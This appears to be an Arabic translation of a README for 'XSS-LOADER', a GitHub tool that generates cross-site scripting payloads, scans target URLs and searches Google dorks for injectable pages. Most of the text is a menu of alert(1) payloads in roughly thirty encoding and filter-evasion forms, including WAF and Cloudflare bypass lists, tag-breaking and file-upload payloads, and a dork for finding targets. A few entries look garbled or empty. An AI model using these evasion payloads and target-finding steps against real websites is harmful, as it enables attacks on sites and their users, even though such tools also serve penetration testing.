
مولد حمولة Xss ~ ماسح Xss ~ باحث دورك Xss

أداة شاملة لـ XSS PAYLOAD GENERATOR - XSS SCANNER - XSS DORK FINDER
إنستغرام: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
تعيين المعامل الافتراضي إلى :<script>alert(1)</script>
تعيين المعامل الافتراضي إلى :<div onpointerover='alert(1)'>MOVE HERE</div
تعيين المعامل الافتراضي إلى :``````
تعيين المعامل الافتراضي إلى :<body ontouchstart=alert(1)>
تعيين المعامل الافتراضي إلى :<svg onload=alert('1')>
يقوم بتشفير الحمولة التي كتبها المستخدم
يقوم بتشفير الحمولة على العلامة المحددة
* | 1. حالة الأحرف الكبيرة----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. حالة أحرف كبيرة وصغيرة----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. تشفير URL -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. تشفير كيان HTML-----> <script>alert(1)</script>
* | 5. تقسيم الحمولة -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. تشفير HEX -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. تشفير UTF-16 -----> تحويل الحمولة إلى تنسيق utf-16.
* | 8. تشفير UTF-32-----> تحويل الحمولة إلى تنسيق utf-32.
* | 9. حذف العلامة -----> ";alert('XSS');//
* | 10. تشفير يونيكود-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. تشفير US-ASCII -----> ¼script¾alert(1)¼/script¾
* | 12. تشفير BASE64 -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. تشفير UTF-7 -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. تجاوز الأقواس -----> <script>alert`1`</script>
* | 15. تشفير UTF-8 -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. اختراق كتلة العلامة-----> "><script>alert(1)</script>
* | 17. اختراق السكريبت-----> </script><script>alert(1)</script>
* | 18. حمولة رفع الملف-----> "><script>alert(1)</script>.gif
* | 19. تجاوز داخل التعليقات-----> <!--><script>alert(1)</script>-->
* | 20. حمولة التحوير-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. صورة مشوهة-----> <script>alert(1)</script>">
* | 22. تجاوز المسافة----->
* | 23. كتلة مخفية منخفضة المستوى-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. حمولات تجاوز جدار الحماية-----> عرض قائمة حمولات تجاوز WAF
* | 25. حمولات تجاوز Cloudflare-----> عرض قائمة حمولات تجاوز Cloudflare
* | 26. حمولات متعددة اللغات-----> عرض قائمة حمولات Polyglot
* | 27. حمولات التنبيه-----> عرض قائمة حمولات التنبيه
* | 28. إنشاء جميع الحمولات-----> عرض إنشاء جميع الحمولات
* | 29. العودة إلى القائمة الرئيسية
* | 30. خروج
بداية ستحتاج إلى إدخال عنوان URL للهدف يرجى إدخال عنوان URL بهذا الشكل مثال==>مثلاً الهدف -----> http://target.com/index.php?name= مختار لفحص قائمة الحمولات
ستتم إضافة النتائج إلى "vulnpayload.txt" بعد الفحص.
أولاً أدخل الدورك للبحث: مثال---->inurl:"search.php?q=" سيتم حفظ النتائج في "dork.txt" بعد الفحص.
أخطاء يونيكود
أخطاء الوحدة
هام:
إذا كنت ترغب في استخدام الأداة لـ python3 المثبتة على ويندوز، قم بتنزيل الرابط أدناه:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
للتقارير عن الأخطاء أو التحسينات، يرجى فتح مشكلة هنا.
حقوق النشر 2020